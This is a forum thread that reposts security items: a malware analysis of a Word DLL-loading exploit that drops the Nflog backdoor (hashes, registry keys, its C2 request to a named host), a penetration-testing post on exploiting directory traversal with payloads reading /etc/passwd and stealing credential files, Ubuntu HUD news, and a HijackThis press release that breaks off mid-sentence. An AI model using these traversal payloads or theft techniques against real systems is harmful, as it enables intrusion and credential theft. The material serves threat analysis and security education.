Nytro

[h=3]Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog[/h][h=2]Wednesday, February 15, 2012[/h]On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks at least with two other exploits in 2011 and they did not reach epidemic proportions like it happend with CVE-2010-3333 RTF or some of the Adobe PDF exploits. I refer to Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability and Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order - Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office but in general) in M-unition: DLL Search Order Hijacking Revisited by Nick Harbour As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is a backdoor trojan Nflog. [h=3][/h] [h=3][/h] [h=3]Common Vulnerabilities and Exposures (CVE)number[/h] [h=3] CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."[/h] [h=3]Microsoft Security Bulletin MS11-073 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)[/h] Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada [h=3][/h] [h=3][/h] [h=3]General File Information[/h] [h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc Size: 22016 MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [h=3]File: fputlsat.dll Size: 126976 MD5: 60068812B59E58D6338AAEBD649F9020[/h] [h=3]Download[/h] Download as a password protected archive (email me if you need the password) [TABLE] [TR] [TD][/TD] [TD][/TD] [/TR] [/TABLE] [h=3]File Desription[/h] [h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc Size: 22016 MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Before the document is open - DLL file is present is the same directory[/TD] [/TR] [/TABLE] The Word document has embedded macro - ActiveX List View Form Control, a very common ActiveX control, which calls fputlsat.dll "Microsoft Office FrontPage Client Utility Library". There is nothing unusual about this behavior, you can read more about this particular control here "Using the ListView ActiveX Control" and it is normal for it to call Frontpage libraries. The vulnerability presents itself in the in the fact that a DLL located in [TABLE=class: tr-caption-container] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=class: tr-caption, align: center]After the document is open. DLL file is renamed to Thumbs.db[/TD] [/TR] [/TABLE] the same folder as the Word document will be used before the legitimate DLL in C:\Program Files\Microsoft Office\Office\.. or other directories. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Activity after the exploit launch[/TD] [/TR] [/TABLE] Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name) Office 8.0 is office 97 (yes, eons ago) and FPDTC.DLL is a Front Page Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but also was used with minor tweaks through all versions of MS Office - starting with Office 97 and ending with Office 2010 we finally found it out. Perhaps, Microsoft Office/VB gurus will be able to answer and / or correct me. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]List view control[/TD] [/TR] [/TABLE] Upon launch, the user is presented with a choice to Run or not to run ActiveX controls. By that time the exploit already worked and the files were dropped/renamed. Anwering Yes will allow the dropped payload iede32.ocx to run. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]ActiveX prompt.[/TD] [TD=class: tr-caption, align: center][/TD] [TD=class: tr-caption, align: center][/TD] [/TR] [/TABLE] The picture below shows locations of the dropped file and the registry changes. SVCHOST.EXE process injection [h=3]File: fputlsat.dll Size: 126976 MD5: 60068812B59E58D6338AAEBD649F9020 [/h] [h=3]fputlsat.dll (thumbs.db) strings[/h] [h=3]Unicode Strings: ---------------------------------------------------------------------------[/h] [h=3]Adobe Photoshop ---- ??? Adobe Photoshop 6.0 ----- ? Unknown if these artifacts mean anything. Photoshop is just as old. May be same DLL code was used for other products.[/h] [h=3]VS_VERSION_INFO StringFileInfo 040404b0 Comments CompanyName Microsoft Corporation FileDescription Microsoft Office FrontPage Client Utility Library FileVersion 11.0.5510.0 InternalName FP40CUTL LegalCopyright Copyright© Microsoft Corporation 2003. All rights reserved. LegalTrademarks OriginalFilename FP40CUTL PrivateBuild ProductName FP40CUTL.DLL -- Frontpage 2000 file. Wonder if Word 2000 was affected too. ProductVersion 11, 0, 0, 0 SpecialBuild VarFileInfo Translation[/h] [h=3]Created Files[/h] File: iede32.ocx Size: 13824 MD5: D4859FC951652B3C9657F8621D4DB625 Virustotal The trojan starts its activity POST /NfLog/Nfile.asp, this trojan is not new, for example there were Zero day CVE-2011-2462 files carrying the same trojan. The service modified is irmon (frequently abused by these types of attacks - here is a ThreatExpert report of a very common APT backdoor using the same service List of strings // Created : 14.02.2012 08:00 // Type : Name List 10001000: SUB_L10001000 10001010: CASE_10001064_PROC0001 10001021: CASE_10001064_PROC0002 10001033: CASE_10001064_PROC0000 1000105A: L1000105A 10001064: CASE_PROCTABLE_10001064 10001080: ServiceMain 1000113A: L1000113A 1000113F: L1000113F 10001152: L10001152 1000115F: L1000115F 10001170: SUB_L10001170 100011C0: L100011C0 100011D1: CASE_10001248_PROC0000 100011E7: CASE_10001248_PROC0004 100011F5: L100011F5 100011F8: CASE_10001248_PROC0001 10001214: CASE_10001248_PROC0002 10001230: CASE_10001248_PROC0003 10001248: CASE_PROCTABLE_10001248 10001260: InstallService 100012A6: L100012A6 100012D8: L100012D8 1000132D: L1000132D 10001339: L10001339 1000135A: L1000135A 1000135F: L1000135F 10001374: L10001374 1000139A: L1000139A 100013DC: L100013DC 10001465: L10001465 1000149F: L1000149F 100014D1: L100014D1 1000151C: L1000151C 10001531: L10001531 10001537: L10001537 1000153A: L1000153A 10001560: RundllInstallA 10001570: UninstallService 100015CD: L100015CD 100015E6: L100015E6 10001614: L10001614 10001628: L10001628 1000162E: L1000162E 1000163E: L1000163E 1000164A: L1000164A 10001660: RundllUninstallA 10001670: SUB_L10001670 100016D9: L100016D9 100016E0: L100016E0 10001726: L10001726 10001764: L10001764 10001789: L10001789 1000178B: L1000178B 100017A5: L100017A5 100017E0: SUB_L100017E0 100017FF: L100017FF 10001901: L10001901 100019CC: L100019CC 10001A8E: L10001A8E 10001A93: L10001A93 10001AA0: SUB_L10001AA0 10001AC5: L10001AC5 10001B03: L10001B03 10001B3B: L10001B3B 10001BF0: SUB_L10001BF0 10001C12: L10001C12 10001C2E: L10001C2E 10001C38: L10001C38 10001C40: SUB_L10001C40 10001C77: L10001C77 10001C80: SUB_L10001C80 10001C9D: L10001C9D 10001CB3: L10001CB3 10001CC9: L10001CC9 10001CD0: SUB_L10001CD0 10001E84: L10001E84 10001E90: SUB_L10001E90 10001EF0: SUB_L10001EF0 10001F57: L10001F57 10001F5D: L10001F5D 10001F71: L10001F71 10001FA7: L10001FA7 10001FCB: L10001FCB 1000200A: L1000200A 1000204B: L1000204B 1000208E: L1000208E 100020C0: SUB_L100020C0 1000212B: L1000212B 1000214F: L1000214F 1000215D: L1000215D 10002170: SUB_L10002170 10002180: L10002180 10002198: L10002198 100021A0: SUB_L100021A0 100021B0: SUB_L100021B0 10002238: L10002238 10002278: L10002278 10002288: L10002288 10002292: L10002292 100022EC: L100022EC 10002300: SUB_L10002300 1000239D: L1000239D 1000239F: L1000239F 100023E9: L100023E9 1000241D: L1000241D 10002446: L10002446 1000247D: L1000247D 100024B3: L100024B3 10002500: SUB_L10002500 10002520: SUB_L10002520 1000255B: L1000255B 100025B8: L100025B8 10002605: L10002605 1000260D: L1000260D 10002613: L10002613 10002630: SUB_L10002630 100026E5: L100026E5 100026FF: L100026FF 10002705: L10002705 10002708: L10002708 10002730: SUB_L10002730 100027D4: L100027D4 100027DA: L100027DA 100027E4: L100027E4 10002800: SUB_L10002800 1000288C: L1000288C 100028EC: L100028EC 100028F2: L100028F2 100028F5: L100028F5 10002920: L10002920 10002936: L10002936 1000293C: jmp_MSVCRT.dll!__CxxFrameHandler 10002950: jmp_MSVCRT.dll!_CxxThrowException 10002956: jmp_MSVCRT.dll!_except_handler3 1000295C: jmp_MSVCRT.dll!??3@YAXPAX@Z 10002962: jmp_MSVCRT.dll!??2@YAPAXI@Z 10002970: SUB_L10002970 1000297C: L1000297C 10002990: L10002990 1000299F: SUB_L1000299F 100029B5: L100029B5 100029DD: L100029DD 100029E1: L100029E1 10002A07: L10002A07 10002A1E: L10002A1E 10002A2F: L10002A2F 10002A34: L10002A34 10002A44: L10002A44 10002A47: L10002A47 10002A4A: EntryPoint 10002A66: L10002A66 10002A70: L10002A70 10002A82: L10002A82 10002A8C: L10002A8C 10002A8E: L10002A8E 10002A92: L10002A92 10002AAE: L10002AAE 10002AB7: L10002AB7 10002AC6: L10002AC6 10002ADD: L10002ADD 10002AE0: L10002AE0 10002AE8: jmp_MSVCRT.dll!??1type_info@@UAE@XZ 10002AEE: jmp_MSVCRT.dll!_initterm 10002B00: L10002B00 10002B10: L10002B10 10002B1B: L10002B1B 10002B30: L10002B30 10003000: ADVAPI32.dll!RegSetValueExA 10003004: ADVAPI32.dll!OpenServiceA 10003008: ADVAPI32.dll!DeleteService 1000300C: ADVAPI32.dll!RegOpenKeyExA 10003010: ADVAPI32.dll!RegQueryValueExA 10003014: ADVAPI32.dll!RegCloseKey 10003018: ADVAPI32.dll!OpenSCManagerA 1000301C: ADVAPI32.dll!CreateServiceA 10003020: ADVAPI32.dll!ChangeServiceConfig2A 10003024: ADVAPI32.dll!CloseServiceHandle 10003028: ADVAPI32.dll!RegisterServiceCtrlHandlerA 1000302C: ADVAPI32.dll!SetServiceStatus 10003030: ADVAPI32.dll!RegCreateKeyA 10003038: KERNEL32.dll!LoadLibraryA 1000303C: KERNEL32.dll!CloseHandle 10003040: KERNEL32.dll!SetFileTime 10003044: KERNEL32.dll!SystemTimeToFileTime 10003048: KERNEL32.dll!CreateFileA 1000304C: KERNEL32.dll!SetEvent 10003050: KERNEL32.dll!OpenEventA 10003054: KERNEL32.dll!GetLastError 10003058: KERNEL32.dll!Sleep 1000305C: KERNEL32.dll!GetModuleFileNameA 10003060: KERNEL32.dll!SetLastError 10003064: KERNEL32.dll!CreateEventA 10003068: KERNEL32.dll!WaitForSingleObject 1000306C: KERNEL32.dll!GetProcAddress 10003070: KERNEL32.dll!FreeConsole 10003074: KERNEL32.dll!GetSystemDirectoryA 10003078: KERNEL32.dll!FreeLibrary 10003080: MSVCRT.dll!??3@YAXPAX@Z 10003084: MSVCRT.dll!??2@YAPAXI@Z 10003088: MSVCRT.dll!atoi 1000308C: MSVCRT.dll!fwrite 10003090: MSVCRT.dll!fclose 10003094: MSVCRT.dll!fopen 10003098: MSVCRT.dll!strstr 1000309C: MSVCRT.dll!sprintf 100030A0: MSVCRT.dll!_snprintf 100030A4: MSVCRT.dll!_strupr 100030A8: MSVCRT.dll!??1type_info@@UAE@XZ 100030AC: MSVCRT.dll!free 100030B0: MSVCRT.dll!_initterm 100030B4: MSVCRT.dll!malloc 100030B8: MSVCRT.dll!_adjust_fdiv 100030BC: MSVCRT.dll!_beginthreadex 100030C0: MSVCRT.dll!_except_handler3 100030C4: MSVCRT.dll!__CxxFrameHandler 100030C8: MSVCRT.dll!strchr 100030CC: MSVCRT.dll!strncat 100030D0: MSVCRT.dll!strncpy 100030D4: MSVCRT.dll!wcstombs 100030D8: MSVCRT.dll!_stricmp 100030DC: MSVCRT.dll!_CxxThrowException 100030E4: WININET.dll!HttpEndRequestA 100030E8: WININET.dll!HttpSendRequestA 100030EC: WININET.dll!HttpAddRequestHeadersA 100030F0: WININET.dll!HttpOpenRequestA 100030F4: WININET.dll!InternetConnectA 100030F8: WININET.dll!InternetSetOptionA 100030FC: WININET.dll!InternetReadFile 10003100: WININET.dll!InternetCloseHandle 10003104: WININET.dll!HttpQueryInfoA 1000310C: WS2_32.dll!WS2_32.9 10003110: WS2_32.dll!WS2_32.52 10003114: WS2_32.dll!WSAIoctl 10003118: WS2_32.dll!WS2_32.116 1000311C: WS2_32.dll!WS2_32.3 10003120: WS2_32.dll!WS2_32.57 10003124: WS2_32.dll!WSASocketA 10003128: WS2_32.dll!WS2_32.115 1000312C: WS2_32.dll!WS2_32.16 10003130: WS2_32.dll!WS2_32.15 10003134: WS2_32.dll!WS2_32.2 10003138: WS2_32.dll!WS2_32.12 10003140: L10003140 1000314C: L1000314C 10003150: L10003150 10003160: L10003160 10003170: L10003170 10003180: L10003180 10003190: L10003190 10003198: L10003198 100031B0: L100031B0 100031B8: L100031B8 100031C8: L100031C8 100031E0: L100031E0 10003200: L10003200 10003220: L10003220 10003230: L10003230 10003240: L10003240 10003260: L10003260 10003270: L10003270 10003288: L10003288 10003298: L10003298 100032B8: L100032B8 100032C0: L100032C0 100032E0: L100032E0 100032F0: L100032F0 10003308: L10003308 10004000: L10004000 10004004: L10004004 10004020: SSZ10004020_www_aviraco_com 10004084: SSZ10004084__IElog 100040E8: L100040E8 100040F0: SSZ100040F0_Network_address_translation_for_ 100041F4: L100041F4 100041F8: SSZ100041F8_SvcHostDLL_exe 10004208: L10004208 10004218: L10004218 10004228: SSZ10004228_RegSetValueEx_ServiceDll_ 10004244: SSZ10004244_ServiceDll 10004250: SSZ10004250_GetModuleFileName___get_dll_path 10004274: SSZ10004274_RegCreateKey_Parameters_ 10004290: SSZ10004290_Parameters 1000429C: SSZ1000429C_SYSTEM_CurrentControlSet_Service 100042C0: SSZ100042C0_IPv6_Stack_Local_Support 100042DC: SSZ100042DC__SystemRoot__System32_svchost_ex 1000430C: SSZ1000430C_RegQueryValueEx_Svchost_netsvcs_ 10004330: SSZ10004330_netsvcs 10004338: SSZ10004338_SOFTWARE_Microsoft_Windows_NT_Cu 10004370: SSZ10004370_Irmon 10004378: SSZ10004378_IEcoreOk 10004384: SSZ10004384_ProcGo 1000438C: SSZ1000438C_GetFile 10004394: SSZ10004394__Nfile_asp 100043A0: L100043A0 100043A4: SSZ100043A4_POST 100043AC: SSZ100043AC_HTTP_1_1 100043B8: SSZ100043B8_Mozilla_4_0__compatible__MSIE_6_ 100043F0: SSZ100043F0_InternetOpenA 10004400: SSZ10004400_wininet_dll 1000440C: L1000440C 10004410: SSZ10004410_InternetSetOptionA 10004424: SSZ10004424_InternetReadFile 10004438: SSZ10004438_InternetConnectA 1000444C: SSZ1000444C_InternetCloseHandle 10004460: SSZ10004460_HttpSendRequestA 10004474: SSZ10004474_HttpQueryInfoA 10004484: SSZ10004484_HttpOpenRequestA 10004498: SSZ10004498_HttpEndRequestA 100044A8: SSZ100044A8__wininet_dll 100044B8: SSZ100044B8_ideo_dll 100044C4: SSZ100044C4_HTTP_1_0 100044D0: L100044D0 100044D4: L100044D4 100044D8: SSZ100044D8_1234567890 100044E4: SSZ100044E4__TestURL_asp 100044F4: L100044F4 100044F8: L100044F8 100044FC: L100044FC 10004500: SSZ10004500_www_microsoft_com 10004514: SSZ10004514_Mozilla_5_0__compatible__MSIE_7_ 10004548: SSZ10004548__s__d 10004550: L10004550 10004554: L10004554 10004558: SSZ10004558_Proxy_Authorization__Basic_ 10004574: SSZ10004574_HEAD 10004580: L10004580 100045A0: L100045A0 100045A4: L100045A4 100045A8: L100045A8 100045AC: L100045AC 100045B0: L100045B0 1000463D: L1000463D 1000483D: L1000483D 1000485D: L1000485D 10004A5D: L10004A5D 10004AE0: L10004AE0 10004AE4: L10004AE4 10004AE8: L10004AE8 10004AEC: L10004AEC 10004AF0: L10004AF0 10004AF4: L10004AF4 10004AF8: L10004AF8 10004AFC: L10004AFC 10004B00: L10004B00 10004B04: L10004B04 10004B08: L10004B08 10004B0C: L10004B0C 10004B10: L10004B10 10004B14: L10004B14 10004F18: L10004F18 10005F1C: L10005F1C 10005F2C: L10005F2C 10005F3C: L10005F3C 10005F40: L10005F40 10006144: L10006144 10006244: L10006244 10006248: L10006248 1000624C: L1000624C 10006250: L10006250 10006254: L10006254 Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters Class Name: <NO CLASS> Last Write Time: 2/14/2012 - 1:40 AM Value 0 Name: ServiceDll Type: REG_EXPAND_SZ Data: C:\WINDOWS\system32\iede32.ocx [h=3]Traffic[/h] In my case, CC was not active or at least I didn't receive any traffic but you can see the initial POST and the domain name. POST /IElog/TestURL.asp HTTP/1.0 User-Agent: www Host: www.aviraco.com Content-Length: 10 Pragma: no-cache 1234567890HTTP/1.1 400 Bad Request Content-Type: text/html Date: Tue, 14 Feb 2012 05:39:57 GMT Connection: close Content-Length: 39 <h1>Bad Request (Invalid Hostname)</h1> Domain Name : aviraco.com PunnyCode : aviraco.com Creation Date : 2011-03-30 10:31:10 Updated Date : 2011-03-30 10:31:10 Expiration Date : 2012-03-30 10:31:10 Registrant: Organization : zhipengwang Name : zhipengwang Address : Zhongguancun Hailong Building, Room 1005 City : haidianqu Province/State : beijingshi Country : china Postal Code : 100083 216.83.63.147 Host reachable, 408 ms. average 216.83.32.0 - 216.83.63.255 Ethr.Net LLC 7960B Soquel Dr. #417 Aptos CA 95003 United States [TABLE] [TR] [TD]IP Address History Event Date Action Pre-Action IP Post-Action IP 2009-12-28 New -none- 174.37.172.68 2010-09-13 Change 174.37.172.68 67.228.81.181 2010-09-24 Change 67.228.81.181 174.37.172.68 2011-02-02 Change 174.37.172.68 67.228.81.180 2011-02-13 Not Resolvable 67.228.81.180 -none- 2011-10-14 New -none- 98.126.113.28 2011-10-25 Change 98.126.113.28 216.83.63.14 Registrar History Date Registrar 2009-12-26 Name.com aka DomainSite 2011-03-29 Xin Net Name Server History Event Date Action Pre-Action Server Post-Action Server 2009-12-28 New -none- Name.com 2011-02-08 Delete Name.com -none- 2011-03-31 New Xinnet.cn Xinnetdns.com 2011-12-13 Transfer Xinnetdns.com Xincache.com RR www.comedns.com. A 216.83.63.147 www.creamofa.com. A 216.83.63.147[/TD] [TD][/TD] [/TR] [/TABLE] [h=3]Automated Scans[/h] Virustotal SHA256: 429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e SHA1: 7dbf130964cdc0110fd517a5d98188df3d56e850 MD5: 275c5ac2067d17187a71b94ccfdc4608 File size: 21.5 KB ( 22016 bytes ) File name: report.doc File type: MS Word Document Detection ratio: 17 / 43 Analysis date: 2012-02-15 04:10:05 UTC ( 46 minutes ago ) Antivirus Result Update AhnLab-V3 Dropper/Ms11-073 20120213 AVG Exploit_c.UDK 20120213 ClamAV Exploit.Doc-2 20120214 Emsisoft Exploit.MSWord.CVE-2011!IK 20120214 eSafe - 20120213 eTrust-Vet - 20120213 Fortinet W97M/CVE_2011_1980.A!exploit 20120214 Ikarus Exploit.MSWord.CVE-2011 20120214 Kaspersky Exploit.MSWord.CVE-2011-1980.a 20120214 McAfee Exploit-CVE2011-1980 20120214 McAfee-GW-Edition - 20120213 Microsoft Exploit:Win32/Actjack.A 20120213 NOD32 W97M/Exploit.CVE-2011-1980.A 20120214 nProtect Trojan-Exploit/W32.Agent.22016 20120213 PCTools Trojan.Generic 20120207 Sophos Troj/Hijack-H 20120214 SUPERAntiSpyware - 20120206 Symantec Trojan.Activehijack 20120214 TrendMicro TROJ_ACTIVEHIJ.A 20120213 TrendMicro-HouseCall TROJ_ACTIVEHIJ.A 20120214 ViRobot Doc.S.MS11-073.22016 20120213 Virustotal SHA256: 48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa SHA1: 8f86b7fcaf0c1ee9b795fa8e559def47ef468128 MD5: 60068812b59e58d6338aaebd649f9020 File size: 124.0 KB ( 126976 bytes ) File name: fputlsat.dll File type: Win32 DLL Detection ratio: 28 / 43 Analysis date: 2012-02-15 04:10:02 UTC ( 23 minutes ago ) AhnLab-V3 Win-Trojan/Activehijack.126976 20120213 AntiVir TR/Drop.Kaliox.A 20120213 Avast Win32:Malware-gen 20120214 BitDefender Trojan.Generic.KD.529689 20120214 DrWeb Trojan.MulDrop3.34467 20120214 Emsisoft Trojan-Dropper.Win32.Agent!IK 20120214 F-Secure Trojan.Generic.KD.529689 20120214 Fortinet W32/Agent.PRG!tr 20120214 GData Trojan.Generic.KD.529689 20120214 Ikarus Trojan-Dropper.Win32.Agent 20120214 K7AntiVirus Riskware 20120213 Kaspersky Trojan-Dropper.Win32.Agent.gjnt 20120214 McAfee Generic Dropper.p 20120214 McAfee-GW-Edition Artemis!60068812B59E 20120213 Microsoft TrojanDropper:Win32/Kaliox.A 20120213 NOD32 Win32/TrojanDropper.Agent.PRG 20120214 Norman W32/Agent.XGSO 20120213 nProtect Trojan-Dropper/W32.Agent.126976.CS 20120213 PCTools Trojan.Dropper 20120207 Symantec Trojan.Dropper 20120214 TrendMicro TROJ_MULDROP.IC 20120213 TrendMicro-HouseCall TROJ_MULDROP.IC 20120214 VIPRE Trojan.Win32.Generic!BT 20120214 ViRobot Trojan.Win32.Activehijack.126976 20120213 VirusBuster Trojan.DR.Agent!ly6ZRARwo6A Virustotal SHA256: 27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793 SHA1: d0c3e34bd97c4aa56fe9f176954d274595926a32 MD5: d4859fc951652b3c9657f8621d4db625 File size: 13.5 KB ( 13824 bytes ) File name: iede32.ocx File type: Win32 DLL Detection ratio: 28 / 42 Analysis date: 2012-02-14 04:13:46 UTC ( 1 day, 2 hours ago ) 0 AhnLab-V3 Win-Trojan/Activehijack.13824 20120213 AntiVir TR/Spy.13824.71 20120214 Antiy-AVL Trojan/Win32.Genome.gen 20120213 BitDefender Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Comodo TrojWare.Win32.GameThief.Nilage.~CRSH 20120214 DrWeb Trojan.Click2.13847 20120214 Emsisoft Trojan.Win32.Spy!IK 20120214 eSafe Win32.GenHeur.LP.Aq@ 20120213 F-Secure Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Fortinet W32/Agent.OLJ 20120214 GData Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214 Ikarus Trojan.Win32.Spy 20120214 K7AntiVirus Riskware 20120213 Kaspersky Trojan.Win32.Genome.aehtz 20120214 McAfee Generic Dropper.p 20120214 McAfee-GW-Edition Artemis!D4859FC95165 20120213 Microsoft TrojanDownloader:Win32/Kaliox.A 20120213 NOD32 Win32/Agent.OLJ 20120214 Norman W32/Troj_Generic.KIKX 20120213 nProtect Trojan/W32.Genome.13824.J 20120213 Sophos Troj/Spy-YL 20120214 Symantec Trojan.Gen.2 20120214 TheHacker Trojan/Agent.olj 20120213 TrendMicro BKDR_CONIP.A 20120214 TrendMicro-HouseCall BKDR_CONIP.A 20120214 ViRobot Trojan.Win32.Activehijack.13824 20120214 VirusBuster Trojan.Agent!KGIS/NcFcUc 20120213 Sursa: contagio: Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog

[h=3]Hunting & Exploiting Directory Traversal[/h][h=2]Friday, February 17, 2012[/h] In cktricky's last post he provided a great outline on the ins and outs of leveraging burp's built in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: How do I find directory traversal & what should I look for if I do? Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, css call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself-- because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in. Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX to services type calls, sometimes in cookies, and occasionally are how pages themselves get served. These all basically look something like: [FONT=&quot] [FONT=&quot]somefunction.php?img=/some/place/graphic.jpg [/FONT] [/FONT] or [FONT=&quot]somefunction.php?page=/view/something[/FONT] The path to the file can either be relative (../../../etc) or in some more rare cases absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted. Neither is a stop get. You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded be about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo: [FONT=&quot]cookie: language=en-us;[/FONT] could turn into: [FONT=&quot]File.Open('/' + language '/' + some-file);[/FONT] [FONT=&quot] File.Open('/' + language + '.' + some-file); [/FONT] If that is true, you can alter the root of a request, then use terminators to kill off the rest of what gets appended (null chars ftw) such as: [FONT=&quot]cookie: language=../../../../../etc/passwd[/FONT] [FONT=&quot] cookie: language=../../../../../etc/passwd;[/FONT][FONT=&quot] [/FONT] Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair-game for that. Now what? Once you've identified a location which appears to be ripe for the testing-- how do you verify and what would you do? To verify, I have found two approaches that work well: default files & known files. The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache Default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually. The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to-- the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like: [FONT=&quot] [FONT=&quot]/mainpage.asp[/FONT] [/FONT] [FONT=&quot] /vulnerableFeature.asp?path=/images/some-image.jpg[/FONT] you'd test for: [FONT=&quot] [FONT=&quot]/vulnerableFeature.asp?path=../mainpage.asp[/FONT] [/FONT] [FONT=&quot] /vulnerableFeature.asp?path=/mainpage.asp[/FONT] Since you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way. If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & sam files). If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. There are occasionally hard coded credentials source, but application configuration files are often gold for credentials. I've found database, admin users, SMTP credentials and FTP users this way. Some final things to consider: Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods. When dynamic features serve files, they often violate other protections. In IIS for instance various extensions cannot be served by the server (.config files for instance). However in most directory traversals you can pull the web.config file out w/o many problems. User controlled uploads often get served dynamically because there isn't a way for the server to know before-hand what the files are. You can sometimes find directory traversal here by uploading files with weird path's in their names (or renaming them after upload). Developers sometimes leave clues to file's physical locations in comments. I once downloaded a source for an entire site because of this. Image / gallery plugins for CMS's are notorious for directory traversal. Error messages are your friend here. If you get a system/application error instead of a file not found type error, you can at least use the mechanism to check for existence of files. Happy Hunting. -kuzushi * Thanks DC & AJ Posted by kuzushi at 2:01 PM Sursa: Carnal0wnage & Attack Research Blog: Hunting & Exploiting Directory Traversal

[h=1]Ubuntu 12.04 LTS Gets HUD Interface[/h]February 17th, 2012, 22:39 GMT · By Marius Nestor The HUD feature in Ubuntu 12.04 LTS With today's updates, the upcoming Ubuntu 12.04 LTS (Precise Pangolin) operating system received many new features and improvements, including the Privacy Settings, Video Lens for Unity and the HUD (Head-Up Display) system described in this article. Originally introduced by Mark Shuttleworth last month, the Head-Up Display, or HUD for short, is some sort of add-on for the Unity interface allowing users to interact with application's menus by pressing the ALT key. At the moment, HUD was introduced alongside the current menus placed on the Unity Panel, but in the end, the Head-Up Display system will entirely replace menus in Unity applications. However, this will most probably happen in Ubuntu 12.10. HUD was developed by Canonical in-house during the last 18 months, and believe it or not it is here to revolutionize the Linux desktop. Sursa: Ubuntu 12.04 LTS Gets HUD Interface - Softpedia

[h=1]Trend Micro Releases HijackThis Source Code to sourceforge.net[/h][h=2]Program's Creator Merijn Bellekom Endorses Open Source Move[/h] By Trend Micro Incorporated Published: Friday, Feb. 17, 2012 - 8:12 am CUPERTINO, Calif., Feb. 17, 2012 -- /PRNewswire/ -- Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security leader, today announced the release of HijackThis as an open source application. HijackThis- HijackThis - Wikipedia, the free encyclopedia - scans your computer to find settings changed by spyware, malware or other unwanted programs. HijackThis also generates an in-depth report to enable expert users to analyze and fix an infected computer. Several security communities use HijackThis log files to help users evaluate and eradicate infections. A common practice for novice users is to generate a HijackThis log file and submit it to one of the many forums devoted to HijackThis on the web. Experts at these forums provide information on which items are causing your problems and how to remove them safely from your computer. The code, originally written in Visual Basic, is now officially available at HiJackThis | Free software downloads at SourceForge.net. "This means that other people can build on a solid base to create or improve their own anti-malware tools," said Merijn Bellekom, the original creator of HijackThis. Trend Micro has offered HijackThis as a free tool since acquiring the antispyware freeware tool from its Netherlands-based creator, Merijn Bellekom in 2007. By then, it had already been downloaded more than 10 million times and was often used to submit logs to online discussion and help forums, such as Castlecops.com, Majorgeeks.com and Spywareinfo.com, to elicit comments that could help in cleaning infected desktops "HijackThis was an essential tool at CastleCops, so much so that there were forums, web applications and services dedicated to it, answering questions posed from the data collected about files and registry entries. Hands down, HijackThis was vital 